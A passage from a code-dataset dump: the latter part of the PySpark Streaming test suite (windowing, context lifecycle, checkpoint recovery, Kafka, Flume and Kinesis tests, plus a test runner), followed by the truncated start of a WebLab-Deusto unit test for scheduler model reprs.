return dstream.groupByKeyAndWindow(1.5, .5).mapValues(list)
expected = [[('a', [0])], [('a', [0, 1])], [('a', [0, 1, 2])], [('a', [1, 2, 3])],
[('a', [2, 3, 4])], [('a', [3, 4])], [('a', [4])]]
self._test_func(input, func, expected)
def test_reduce_by_invalid_window(self):
input1 = [range(3), range(5), range(1), range(6)]
d1 = self.ssc.queueStream(input1)
self.assertRaises(ValueError, lambda: d1.reduceByKeyAndWindow(None, None, 0.1, 0.1))
self.assertRaises(ValueError, lambda: d1.reduceByKeyAndWindow(None, None, 1, 0.1))
def test_reduce_by_key_and_window_with_none_invFunc(self):
input = [range(1), range(2), range(3), range(4), range(5), range(6)]
def func(dstream):
return dstream.map(lambda x: (x, 1))\
.reduceByKeyAndWindow(operator.add, None, 5, 1)\
.filter(lambda kv: kv[1] > 0).count()
expected = [[2], [4], [6], [6], [6], [6]]
self._test_func(input, func, expected)
class StreamingContextTests(PySparkStreamingTestCase):
duration = 0.1
setupCalled = False
def _add_input_stream(self):
inputs = [range(1, x) for x in range(101)]
stream = self.ssc.queueStream(inputs)
self._collect(stream, 1, block=False)
def test_stop_only_streaming_context(self):
self._add_input_stream()
self.ssc.start()
self.ssc.stop(False)
self.assertEqual(len(self.sc.parallelize(range(5), 5).glom().collect()), 5)
def test_stop_multiple_times(self):
self._add_input_stream()
self.ssc.start()
self.ssc.stop(False)
self.ssc.stop(False)
def test_queue_stream(self):
input = [list(range(i + 1)) for i in range(3)]
dstream = self.ssc.queueStream(input)
result = self._collect(dstream, 3)
self.assertEqual(input, result)
def test_text_file_stream(self):
d = tempfile.mkdtemp()
self.ssc = StreamingContext(self.sc, self.duration)
dstream2 = self.ssc.textFileStream(d).map(int)
result = self._collect(dstream2, 2, block=False)
self.ssc.start()
for name in ('a', 'b'):
time.sleep(1)
with open(os.path.join(d, name), "w") as f:
f.writelines(["%d\n" % i for i in range(10)])
self.wait_for(result, 2)
self.assertEqual([list(range(10)), list(range(10))], result)
def test_binary_records_stream(self):
d = tempfile.mkdtemp()
self.ssc = StreamingContext(self.sc, self.duration)
dstream = self.ssc.binaryRecordsStream(d, 10).map(
lambda v: struct.unpack("10b", bytes(v)))
result = self._collect(dstream, 2, block=False)
self.ssc.start()
for name in ('a', 'b'):
time.sleep(1)
with open(os.path.join(d, name), "wb") as f:
f.write(bytearray(range(10)))
self.wait_for(result, 2)
self.assertEqual([list(range(10)), list(range(10))], [list(v[0]) for v in result])
def test_union(self):
input = [list(range(i + 1)) for i in range(3)]
dstream = self.ssc.queueStream(input)
dstream2 = self.ssc.queueStream(input)
dstream3 = self.ssc.union(dstream, dstream2)
result = self._collect(dstream3, 3)
expected = [i * 2 for i in input]
self.assertEqual(expected, result)
def test_transform(self):
dstream1 = self.ssc.queueStream([[1]])
dstream2 = self.ssc.queueStream([[2]])
dstream3 = self.ssc.queueStream([[3]])
def func(rdds):
rdd1, rdd2, rdd3 = rdds
return rdd2.union(rdd3).union(rdd1)
dstream = self.ssc.transform([dstream1, dstream2, dstream3], func)
self.assertEqual([2, 3, 1], self._take(dstream, 3))
def test_transform_pairrdd(self):
# This regression test case is for SPARK-17756.
dstream = self.ssc.queueStream(
[[1], [2], [3]]).transform(lambda rdd: rdd.cartesian(rdd))
self.assertEqual([(1, 1), (2, 2), (3, 3)], self._take(dstream, 3))
def test_get_active(self):
self.assertEqual(StreamingContext.getActive(), None)
# Verify that getActive() returns the active context
self.ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
self.ssc.start()
self.assertEqual(StreamingContext.getActive(), self.ssc)
# Verify that getActive() returns None
self.ssc.stop(False)
self.assertEqual(StreamingContext.getActive(), None)
# Verify that if the Java context is stopped, then getActive() returns None
self.ssc = StreamingContext(self.sc, self.duration)
self.ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
self.ssc.start()
self.assertEqual(StreamingContext.getActive(), self.ssc)
self.ssc._jssc.stop(False)
self.assertEqual(StreamingContext.getActive(), None)
def test_get_active_or_create(self):
# Test StreamingContext.getActiveOrCreate() without checkpoint data
# See CheckpointTests for tests with checkpoint data
self.ssc = None
self.assertEqual(StreamingContext.getActive(), None)
def setupFunc():
ssc = StreamingContext(self.sc, self.duration)
ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
self.setupCalled = True
return ssc
# Verify that getActiveOrCreate() (w/o checkpoint) calls setupFunc when no context is active
self.setupCalled = False
self.ssc = StreamingContext.getActiveOrCreate(None, setupFunc)
self.assertTrue(self.setupCalled)
# Verify that getActiveOrCreate() returns active context and does not call the setupFunc
self.ssc.start()
self.setupCalled = False
self.assertEqual(StreamingContext.getActiveOrCreate(None, setupFunc), self.ssc)
self.assertFalse(self.setupCalled)
# Verify that getActiveOrCreate() calls setupFunc after active context is stopped
self.ssc.stop(False)
self.setupCalled = False
self.ssc = StreamingContext.getActiveOrCreate(None, setupFunc)
self.assertTrue(self.setupCalled)
# Verify that if the Java context is stopped, then getActive() returns None
self.ssc = StreamingContext(self.sc, self.duration)
self.ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
self.ssc.start()
self.assertEqual(StreamingContext.getActive(), self.ssc)
self.ssc._jssc.stop(False)
self.setupCalled = False
self.ssc = StreamingContext.getActiveOrCreate(None, setupFunc)
self.assertTrue(self.setupCalled)
def test_await_termination_or_timeout(self):
self._add_input_stream()
self.ssc.start()
self.assertFalse(self.ssc.awaitTerminationOrTimeout(0.001))
self.ssc.stop(False)
self.assertTrue(self.ssc.awaitTerminationOrTimeout(0.001))
class CheckpointTests(unittest.TestCase):
setupCalled = False
@staticmethod
def tearDownClass():
# Clean up in the JVM just in case there has been some issues in Python API
if SparkContext._jvm is not None:
jStreamingContextOption = \
SparkContext._jvm.org.apache.spark.streaming.StreamingContext.getActive()
if jStreamingContextOption.nonEmpty():
jStreamingContextOption.get().stop()
def setUp(self):
self.ssc = None
self.sc = None
self.cpd = None
def tearDown(self):
if self.ssc is not None:
self.ssc.stop(True)
if self.sc is not None:
self.sc.stop()
if self.cpd is not None:
shutil.rmtree(self.cpd)
def test_transform_function_serializer_failure(self):
inputd = tempfile.mkdtemp()
self.cpd = tempfile.mkdtemp("test_transform_function_serializer_failure")
def setup():
conf = SparkConf().set("spark.default.parallelism", 1)
sc = SparkContext(conf=conf)
ssc = StreamingContext(sc, 0.5)
# A function that cannot be serialized
def process(time, rdd):
sc.parallelize(range(1, 10))
ssc.textFileStream(inputd).foreachRDD(process)
return ssc
self.ssc = StreamingContext.getOrCreate(self.cpd, setup)
try:
self.ssc.start()
except:
import traceback
failure = traceback.format_exc()
self.assertTrue(
"It appears that you are attempting to reference SparkContext" in failure)
return
self.fail("using SparkContext in process should fail because it's not Serializable")
def test_get_or_create_and_get_active_or_create(self):
inputd = tempfile.mkdtemp()
outputd = tempfile.mkdtemp() + "/"
def updater(vs, s):
return sum(vs, s or 0)
def setup():
conf = SparkConf().set("spark.default.parallelism", 1)
sc = SparkContext(conf=conf)
ssc = StreamingContext(sc, 2)
dstream = ssc.textFileStream(inputd).map(lambda x: (x, 1))
wc = dstream.updateStateByKey(updater)
wc.map(lambda x: "%s,%d" % x).saveAsTextFiles(outputd + "test")
wc.checkpoint(2)
self.setupCalled = True
return ssc
# Verify that getOrCreate() calls setup() in absence of checkpoint files
self.cpd = tempfile.mkdtemp("test_streaming_cps")
self.setupCalled = False
self.ssc = StreamingContext.getOrCreate(self.cpd, setup)
self.assertTrue(self.setupCalled)
self.ssc.start()
def check_output(n):
while not os.listdir(outputd):
if self.ssc.awaitTerminationOrTimeout(0.5):
raise Exception("ssc stopped")
time.sleep(1) # make sure mtime is larger than the previous one
with open(os.path.join(inputd, str(n)), 'w') as f:
f.writelines(["%d\n" % i for i in range(10)])
while True:
if self.ssc.awaitTerminationOrTimeout(0.5):
raise Exception("ssc stopped")
p = os.path.join(outputd, max(os.listdir(outputd)))
if '_SUCCESS' not in os.listdir(p):
# not finished
continue
ordd = self.ssc.sparkContext.textFile(p).map(lambda line: line.split(","))
d = ordd.values().map(int).collect()
if not d:
continue
self.assertEqual(10, len(d))
s = set(d)
self.assertEqual(1, len(s))
m = s.pop()
if n > m:
continue
self.assertEqual(n, m)
break
check_output(1)
check_output(2)
# Verify the getOrCreate() recovers from checkpoint files
self.ssc.stop(True, True)
time.sleep(1)
self.setupCalled = False
self.ssc = StreamingContext.getOrCreate(self.cpd, setup)
self.assertFalse(self.setupCalled)
self.ssc.start()
check_output(3)
# Verify that getOrCreate() uses existing SparkContext
self.ssc.stop(True, True)
time.sleep(1)
self.sc = SparkContext(conf=SparkConf())
self.setupCalled = False
self.ssc = StreamingContext.getOrCreate(self.cpd, setup)
self.assertFalse(self.setupCalled)
self.assertTrue(self.ssc.sparkContext == self.sc)
# Verify the getActiveOrCreate() recovers from checkpoint files
self.ssc.stop(True, True)
time.sleep(1)
self.setupCalled = False
self.ssc = StreamingContext.getActiveOrCreate(self.cpd, setup)
self.assertFalse(self.setupCalled)
self.ssc.start()
check_output(4)
# Verify that getActiveOrCreate() returns active context
self.setupCalled = False
self.assertEqual(StreamingContext.getActiveOrCreate(self.cpd, setup), self.ssc)
self.assertFalse(self.setupCalled)
# Verify that getActiveOrCreate() uses existing SparkContext
self.ssc.stop(True, True)
time.sleep(1)
self.sc = SparkContext(conf=SparkConf())
self.setupCalled = False
self.ssc = StreamingContext.getActiveOrCreate(self.cpd, setup)
self.assertFalse(self.setupCalled)
self.assertTrue(self.ssc.sparkContext == self.sc)
# Verify that getActiveOrCreate() calls setup() in absence of checkpoint files
self.ssc.stop(True, True)
shutil.rmtree(self.cpd) # delete checkpoint directory
time.sleep(1)
self.setupCalled = False
self.ssc = StreamingContext.getActiveOrCreate(self.cpd, setup)
self.assertTrue(self.setupCalled)
# Stop everything
self.ssc.stop(True, True)
class KafkaStreamTests(PySparkStreamingTestCase):
timeout = 20 # seconds
duration = 1
def setUp(self):
super(KafkaStreamTests, self).setUp()
self._kafkaTestUtils = self.ssc._jvm.org.apache.spark.streaming.kafka.KafkaTestUtils()
self._kafkaTestUtils.setup()
def tearDown(self):
super(KafkaStreamTests, self).tearDown()
if self._kafkaTestUtils is not None:
self._kafkaTestUtils.teardown()
self._kafkaTestUtils = None
def _randomTopic(self):
return "topic-%d" % random.randint(0, 10000)
def _validateStreamResult(self, sendData, stream):
result = {}
for i in chain.from_iterable(self._collect(stream.map(lambda x: x[1]),
sum(sendData.values()))):
result[i] = result.get(i, 0) + 1
self.assertEqual(sendData, result)
def _validateRddResult(self, sendData, rdd):
result = {}
for i in rdd.map(lambda x: x[1]).collect():
result[i] = result.get(i, 0) + 1
self.assertEqual(sendData, result)
def test_kafka_stream(self):
"""Test the Python Kafka stream API."""
topic = self._randomTopic()
sendData = {"a": 3, "b": 5, "c": 10}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
stream = KafkaUtils.createStream(self.ssc, self._kafkaTestUtils.zkAddress(),
"test-streaming-consumer", {topic: 1},
{"auto.offset.reset": "smallest"})
self._validateStreamResult(sendData, stream)
def test_kafka_direct_stream(self):
"""Test the Python direct Kafka stream API."""
topic = self._randomTopic()
sendData = {"a": 1, "b": 2, "c": 3}
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress(),
"auto.offset.reset": "smallest"}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams)
self._validateStreamResult(sendData, stream)
def test_kafka_direct_stream_from_offset(self):
"""Test the Python direct Kafka stream API with start offset specified."""
topic = self._randomTopic()
sendData = {"a": 1, "b": 2, "c": 3}
fromOffsets = {TopicAndPartition(topic, 0): long(0)}
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams, fromOffsets)
self._validateStreamResult(sendData, stream)
def test_kafka_rdd(self):
"""Test the Python direct Kafka RDD API."""
topic = self._randomTopic()
sendData = {"a": 1, "b": 2}
offsetRanges = [OffsetRange(topic, 0, long(0), long(sum(sendData.values())))]
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
rdd = KafkaUtils.createRDD(self.sc, kafkaParams, offsetRanges)
self._validateRddResult(sendData, rdd)
def test_kafka_rdd_with_leaders(self):
"""Test the Python direct Kafka RDD API with leaders."""
topic = self._randomTopic()
sendData = {"a": 1, "b": 2, "c": 3}
offsetRanges = [OffsetRange(topic, 0, long(0), long(sum(sendData.values())))]
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
address = self._kafkaTestUtils.brokerAddress().split(":")
leaders = {TopicAndPartition(topic, 0): Broker(address[0], int(address[1]))}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
rdd = KafkaUtils.createRDD(self.sc, kafkaParams, offsetRanges, leaders)
self._validateRddResult(sendData, rdd)
def test_kafka_rdd_get_offsetRanges(self):
"""Test Python direct Kafka RDD get OffsetRanges."""
topic = self._randomTopic()
sendData = {"a": 3, "b": 4, "c": 5}
offsetRanges = [OffsetRange(topic, 0, long(0), long(sum(sendData.values())))]
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
rdd = KafkaUtils.createRDD(self.sc, kafkaParams, offsetRanges)
self.assertEqual(offsetRanges, rdd.offsetRanges())
def test_kafka_direct_stream_foreach_get_offsetRanges(self):
"""Test the Python direct Kafka stream foreachRDD get offsetRanges."""
topic = self._randomTopic()
sendData = {"a": 1, "b": 2, "c": 3}
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress(),
"auto.offset.reset": "smallest"}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams)
offsetRanges = []
def getOffsetRanges(_, rdd):
for o in rdd.offsetRanges():
offsetRanges.append(o)
stream.foreachRDD(getOffsetRanges)
self.ssc.start()
self.wait_for(offsetRanges, 1)
self.assertEqual(offsetRanges, [OffsetRange(topic, 0, long(0), long(6))])
def test_kafka_direct_stream_transform_get_offsetRanges(self):
"""Test the Python direct Kafka stream transform get offsetRanges."""
topic = self._randomTopic()
sendData = {"a": 1, "b": 2, "c": 3}
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress(),
"auto.offset.reset": "smallest"}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams)
offsetRanges = []
def transformWithOffsetRanges(rdd):
for o in rdd.offsetRanges():
offsetRanges.append(o)
return rdd
# Test whether it is ok mixing KafkaTransformedDStream and TransformedDStream together,
# only the TransformedDstreams can be folded together.
stream.transform(transformWithOffsetRanges).map(lambda kv: kv[1]).count().pprint()
self.ssc.start()
self.wait_for(offsetRanges, 1)
self.assertEqual(offsetRanges, [OffsetRange(topic, 0, long(0), long(6))])
def test_topic_and_partition_equality(self):
topic_and_partition_a = TopicAndPartition("foo", 0)
topic_and_partition_b = TopicAndPartition("foo", 0)
topic_and_partition_c = TopicAndPartition("bar", 0)
topic_and_partition_d = TopicAndPartition("foo", 1)
self.assertEqual(topic_and_partition_a, topic_and_partition_b)
self.assertNotEqual(topic_and_partition_a, topic_and_partition_c)
self.assertNotEqual(topic_and_partition_a, topic_and_partition_d)
def test_kafka_direct_stream_transform_with_checkpoint(self):
"""Test the Python direct Kafka stream transform with checkpoint correctly recovered."""
topic = self._randomTopic()
sendData = {"a": 1, "b": 2, "c": 3}
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress(),
"auto.offset.reset": "smallest"}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
offsetRanges = []
def transformWithOffsetRanges(rdd):
for o in rdd.offsetRanges():
offsetRanges.append(o)
return rdd
self.ssc.stop(False)
self.ssc = None
tmpdir = "checkpoint-test-%d" % random.randint(0, 10000)
def setup():
ssc = StreamingContext(self.sc, 0.5)
ssc.checkpoint(tmpdir)
stream = KafkaUtils.createDirectStream(ssc, [topic], kafkaParams)
stream.transform(transformWithOffsetRanges).count().pprint()
return ssc
try:
ssc1 = StreamingContext.getOrCreate(tmpdir, setup)
ssc1.start()
self.wait_for(offsetRanges, 1)
self.assertEqual(offsetRanges, [OffsetRange(topic, 0, long(0), long(6))])
# To make sure some checkpoint is written
time.sleep(3)
ssc1.stop(False)
ssc1 = None
# Restart again to make sure the checkpoint is recovered correctly
ssc2 = StreamingContext.getOrCreate(tmpdir, setup)
ssc2.start()
ssc2.awaitTermination(3)
ssc2.stop(stopSparkContext=False, stopGraceFully=True)
ssc2 = None
finally:
shutil.rmtree(tmpdir)
def test_kafka_rdd_message_handler(self):
"""Test Python direct Kafka RDD MessageHandler."""
topic = self._randomTopic()
sendData = {"a": 1, "b": 1, "c": 2}
offsetRanges = [OffsetRange(topic, 0, long(0), long(sum(sendData.values())))]
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress()}
def getKeyAndDoubleMessage(m):
return m and (m.key, m.message * 2)
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
rdd = KafkaUtils.createRDD(self.sc, kafkaParams, offsetRanges,
messageHandler=getKeyAndDoubleMessage)
self._validateRddResult({"aa": 1, "bb": 1, "cc": 2}, rdd)
def test_kafka_direct_stream_message_handler(self):
"""Test the Python direct Kafka stream MessageHandler."""
topic = self._randomTopic()
sendData = {"a": 1, "b": 2, "c": 3}
kafkaParams = {"metadata.broker.list": self._kafkaTestUtils.brokerAddress(),
"auto.offset.reset": "smallest"}
self._kafkaTestUtils.createTopic(topic)
self._kafkaTestUtils.sendMessages(topic, sendData)
def getKeyAndDoubleMessage(m):
return m and (m.key, m.message * 2)
stream = KafkaUtils.createDirectStream(self.ssc, [topic], kafkaParams,
messageHandler=getKeyAndDoubleMessage)
self._validateStreamResult({"aa": 1, "bb": 2, "cc": 3}, stream)
class FlumeStreamTests(PySparkStreamingTestCase):
timeout = 20 # seconds
duration = 1
def setUp(self):
super(FlumeStreamTests, self).setUp()
self._utils = self.ssc._jvm.org.apache.spark.streaming.flume.FlumeTestUtils()
def tearDown(self):
if self._utils is not None:
self._utils.close()
self._utils = None
super(FlumeStreamTests, self).tearDown()
def _startContext(self, n, compressed):
# Start the StreamingContext and also collect the result
dstream = FlumeUtils.createStream(self.ssc, "localhost", self._utils.getTestPort(),
enableDecompression=compressed)
result = []
def get_output(_, rdd):
for event in rdd.collect():
if len(result) < n:
result.append(event)
dstream.foreachRDD(get_output)
self.ssc.start()
return result
def _validateResult(self, input, result):
# Validate both the header and the body
header = {"test": "header"}
self.assertEqual(len(input), len(result))
for i in range(0, len(input)):
self.assertEqual(header, result[i][0])
self.assertEqual(input[i], result[i][1])
def _writeInput(self, input, compressed):
# Try to write input to the receiver until success or timeout
start_time = time.time()
while True:
try:
self._utils.writeInput(input, compressed)
break
except:
if time.time() - start_time < self.timeout:
time.sleep(0.01)
else:
raise
def test_flume_stream(self):
input = [str(i) for i in range(1, 101)]
result = self._startContext(len(input), False)
self._writeInput(input, False)
self.wait_for(result, len(input))
self._validateResult(input, result)
def test_compressed_flume_stream(self):
input = [str(i) for i in range(1, 101)]
result = self._startContext(len(input), True)
self._writeInput(input, True)
self.wait_for(result, len(input))
self._validateResult(input, result)
class FlumePollingStreamTests(PySparkStreamingTestCase):
timeout = 20 # seconds
duration = 1
maxAttempts = 5
def setUp(self):
self._utils = self.sc._jvm.org.apache.spark.streaming.flume.PollingFlumeTestUtils()
def tearDown(self):
if self._utils is not None:
self._utils.close()
self._utils = None
def _writeAndVerify(self, ports):
# Set up the streaming context and input streams
ssc = StreamingContext(self.sc, self.duration)
try:
addresses = [("localhost", port) for port in ports]
dstream = FlumeUtils.createPollingStream(
ssc,
addresses,
maxBatchSize=self._utils.eventsPerBatch(),
parallelism=5)
outputBuffer = []
def get_output(_, rdd):
for e in rdd.collect():
outputBuffer.append(e)
dstream.foreachRDD(get_output)
ssc.start()
self._utils.sendDataAndEnsureAllDataHasBeenReceived()
self.wait_for(outputBuffer, self._utils.getTotalEvents())
outputHeaders = [event[0] for event in outputBuffer]
outputBodies = [event[1] for event in outputBuffer]
self._utils.assertOutput(outputHeaders, outputBodies)
finally:
ssc.stop(False)
def _testMultipleTimes(self, f):
attempt = 0
while True:
try:
f()
break
except:
attempt += 1
if attempt >= self.maxAttempts:
raise
else:
import traceback
traceback.print_exc()
def _testFlumePolling(self):
try:
port = self._utils.startSingleSink()
self._writeAndVerify([port])
self._utils.assertChannelsAreEmpty()
finally:
self._utils.close()
def _testFlumePollingMultipleHosts(self):
try:
port = self._utils.startSingleSink()
self._writeAndVerify([port])
self._utils.assertChannelsAreEmpty()
finally:
self._utils.close()
def test_flume_polling(self):
self._testMultipleTimes(self._testFlumePolling)
def test_flume_polling_multiple_hosts(self):
self._testMultipleTimes(self._testFlumePollingMultipleHosts)
class KinesisStreamTests(PySparkStreamingTestCase):
def test_kinesis_stream_api(self):
# Don't start the StreamingContext because we cannot test it in Jenkins
kinesisStream1 = KinesisUtils.createStream(
self.ssc, "myAppNam", "mySparkStream",
"https://kinesis.us-west-2.amazonaws.com", "us-west-2",
InitialPositionInStream.LATEST, 2, StorageLevel.MEMORY_AND_DISK_2)
kinesisStream2 = KinesisUtils.createStream(
self.ssc, "myAppNam", "mySparkStream",
"https://kinesis.us-west-2.amazonaws.com", "us-west-2",
InitialPositionInStream.LATEST, 2, StorageLevel.MEMORY_AND_DISK_2,
"awsAccessKey", "awsSecretKey")
def test_kinesis_stream(self):
if not are_kinesis_tests_enabled:
sys.stderr.write(
"Skipped test_kinesis_stream (enable by setting environment variable %s=1"
% kinesis_test_environ_var)
return
import random
kinesisAppName = ("KinesisStreamTests-%d" % abs(random.randint(0, 10000000)))
kinesisTestUtils = self.ssc._jvm.org.apache.spark.streaming.kinesis.KinesisTestUtils(2)
try:
kinesisTestUtils.createStream()
aWSCredentials = kinesisTestUtils.getAWSCredentials()
stream = KinesisUtils.createStream(
self.ssc, kinesisAppName, kinesisTestUtils.streamName(),
kinesisTestUtils.endpointUrl(), kinesisTestUtils.regionName(),
InitialPositionInStream.LATEST, 10, StorageLevel.MEMORY_ONLY,
aWSCredentials.getAWSAccessKeyId(), aWSCredentials.getAWSSecretKey())
outputBuffer = []
def get_output(_, rdd):
for e in rdd.collect():
outputBuffer.append(e)
stream.foreachRDD(get_output)
self.ssc.start()
testData = [i for i in range(1, 11)]
expectedOutput = set([str(i) for i in testData])
start_time = time.time()
while time.time() - start_time < 120:
kinesisTestUtils.pushData(testData)
if expectedOutput == set(outputBuffer):
break
time.sleep(10)
self.assertEqual(expectedOutput, set(outputBuffer))
except:
import traceback
traceback.print_exc()
raise
finally:
self.ssc.stop(False)
kinesisTestUtils.deleteStream()
kinesisTestUtils.deleteDynamoDBTable(kinesisAppName)
# Search jar in the project dir using the jar name_prefix for both sbt build and maven build because
# the artifact jars are in different directories.
def search_jar(dir, name_prefix):
# We should ignore the following jars
ignored_jar_suffixes = ("javadoc.jar", "sources.jar", "test-sources.jar", "tests.jar")
jars = (glob.glob(os.path.join(dir, "target/scala-*/" + name_prefix + "-*.jar")) + # sbt build
glob.glob(os.path.join(dir, "target/" + name_prefix + "_*.jar"))) # maven build
return [jar for jar in jars if not jar.endswith(ignored_jar_suffixes)]
def search_kafka_assembly_jar():
SPARK_HOME = os.environ["SPARK_HOME"]
kafka_assembly_dir = os.path.join(SPARK_HOME, "external/kafka-0-8-assembly")
jars = search_jar(kafka_assembly_dir, "spark-streaming-kafka-0-8-assembly")
if not jars:
raise Exception(
("Failed to find Spark Streaming kafka assembly jar in %s. " % kafka_assembly_dir) +
"You need to build Spark with "
"'build/sbt -Pkafka-0-8 assembly/package streaming-kafka-0-8-assembly/assembly' or "
"'build/mvn -DskipTests -Pkafka-0-8 package' before running this test.")
elif len(jars) > 1:
raise Exception(("Found multiple Spark Streaming Kafka assembly JARs: %s; please "
"remove all but one") % (", ".join(jars)))
else:
return jars[0]
def search_flume_assembly_jar():
SPARK_HOME = os.environ["SPARK_HOME"]
flume_assembly_dir = os.path.join(SPARK_HOME, "external/flume-assembly")
jars = search_jar(flume_assembly_dir, "spark-streaming-flume-assembly")
if not jars:
raise Exception(
("Failed to find Spark Streaming Flume assembly jar in %s. " % flume_assembly_dir) +
"You need to build Spark with "
"'build/sbt -Pflume assembly/package streaming-flume-assembly/assembly' or "
"'build/mvn -DskipTests -Pflume package' before running this test.")
elif len(jars) > 1:
raise Exception(("Found multiple Spark Streaming Flume assembly JARs: %s; please "
"remove all but one") % (", ".join(jars)))
else:
return jars[0]
def _kinesis_asl_assembly_dir():
SPARK_HOME = os.environ["SPARK_HOME"]
return os.path.join(SPARK_HOME, "external/kinesis-asl-assembly")
def search_kinesis_asl_assembly_jar():
jars = search_jar(_kinesis_asl_assembly_dir(), "spark-streaming-kinesis-asl-assembly")
if not jars:
return None
elif len(jars) > 1:
raise Exception(("Found multiple Spark Streaming Kinesis ASL assembly JARs: %s; please "
"remove all but one") % (", ".join(jars)))
else:
return jars[0]
# Must be same as the variable and condition defined in modules.py
flume_test_environ_var = "ENABLE_FLUME_TESTS"
are_flume_tests_enabled = os.environ.get(flume_test_environ_var) == '1'
# Must be same as the variable and condition defined in modules.py
kafka_test_environ_var = "ENABLE_KAFKA_0_8_TESTS"
are_kafka_tests_enabled = os.environ.get(kafka_test_environ_var) == '1'
# Must be same as the variable and condition defined in KinesisTestUtils.scala and modules.py
kinesis_test_environ_var = "ENABLE_KINESIS_TESTS"
are_kinesis_tests_enabled = os.environ.get(kinesis_test_environ_var) == '1'
if __name__ == "__main__":
from pyspark.streaming.tests import *
kafka_assembly_jar = search_kafka_assembly_jar()
flume_assembly_jar = search_flume_assembly_jar()
kinesis_asl_assembly_jar = search_kinesis_asl_assembly_jar()
if kinesis_asl_assembly_jar is None:
kinesis_jar_present = False
jars = "%s,%s" % (kafka_assembly_jar, flume_assembly_jar)
else:
kinesis_jar_present = True
jars = "%s,%s,%s" % (kafka_assembly_jar, flume_assembly_jar, kinesis_asl_assembly_jar)
existing_args = os.environ.get("PYSPARK_SUBMIT_ARGS", "pyspark-shell")
jars_args = "--jars %s" % jars
os.environ["PYSPARK_SUBMIT_ARGS"] = " ".join([jars_args, existing_args])
testcases = [BasicOperationTests, WindowFunctionTests, StreamingContextTests, CheckpointTests,
StreamingListenerTests]
if are_flume_tests_enabled:
testcases.append(FlumeStreamTests)
testcases.append(FlumePollingStreamTests)
else:
sys.stderr.write(
"Skipped test_flume_stream (enable by setting environment variable %s=1"
% flume_test_environ_var)
if are_kafka_tests_enabled:
testcases.append(KafkaStreamTests)
else:
sys.stderr.write(
"Skipped test_kafka_stream (enable by setting environment variable %s=1"
% kafka_test_environ_var)
if kinesis_jar_present is True:
testcases.append(KinesisStreamTests)
elif are_kinesis_tests_enabled is False:
sys.stderr.write("Skipping all Kinesis Python tests as the optional Kinesis project was "
"not compiled into a JAR. To run these tests, "
"you need to build Spark with 'build/sbt -Pkinesis-asl assembly/package "
"streaming-kinesis-asl-assembly/assembly' or "
"'build/mvn -Pkinesis-asl package' before running this test.")
else:
raise Exception(
("Failed to find Spark Streaming Kinesis assembly jar in %s. "
% _kinesis_asl_assembly_dir()) +
"You need to build Spark with 'build/sbt -Pkinesis-asl "
"assembly/package streaming-kinesis-asl-assembly/assembly'"
"or 'build/mvn -Pkinesis-asl package' before running this test.")
sys.stderr.write("Running tests: %s \n" % (str(testcases)))
failed = False
for testcase in testcases:
sys.stderr.write("[Running %s]\n" % (testcase))
tests = unittest.TestLoader().loadTestsFromTestCase(testcase)
if xmlrunner:
result = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2).run(tests)
if not result.wasSuccessful():
failed = True
else:
result = unittest.TextTestRunner(verbosity=2).run(tests)
if not result.wasSuccessful():
failed = True
sys.exit(failed)
| apache-2.0 |
morelab/weblabdeusto | server/src/test/unit/weblab/core/coordinator/sql/test_priority_queue_scheduler_model.py | 3 | 2019 | #!/usr/bin/env python
#-*-*- encoding: utf-8 -*-*-
#
# Copyright (C) 2005 onwards University of Deusto
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# This software consists of contributions made by many individuals,
# listed below:
#
# Author: Pablo Orduña <pablo@ordunya.com>
#
from __future__ import print_function, unicode_literals
import unittest
import weblab.core.coordinator.sql.priority_queue_scheduler_model as PQSM
import weblab.core.coordinator.sql.model as CM
class PriorityQueueSchedulerModelTestCase(unittest.TestCase):
def test_repr_pq_current_reservation(self):
resource_type = CM.ResourceType("foo")
resource_instance = CM.ResourceInstance(resource_type, "instance")
current_resource_slot = CM.CurrentResourceSlot(resource_instance)
slot_reservation = CM.SchedulingSchemaIndependentSlotReservation(current_resource_slot)
experiment_type = CM.ExperimentType("exp", "cat")
reservation = CM.Reservation("hola", "{}", "{}", "{}", None)
reservation.experiment_type = experiment_type
current_reservation = CM.CurrentReservation("hola")
concrete_current_reservation = PQSM.ConcreteCurrentReservation(slot_reservation, current_reservation.id, 50, 100, 1, True)
repr(concrete_current_reservation) # No exception is raised
def test_repr_pq_waiting_reservation(self):
resource_type = CM.ResourceType("foo")
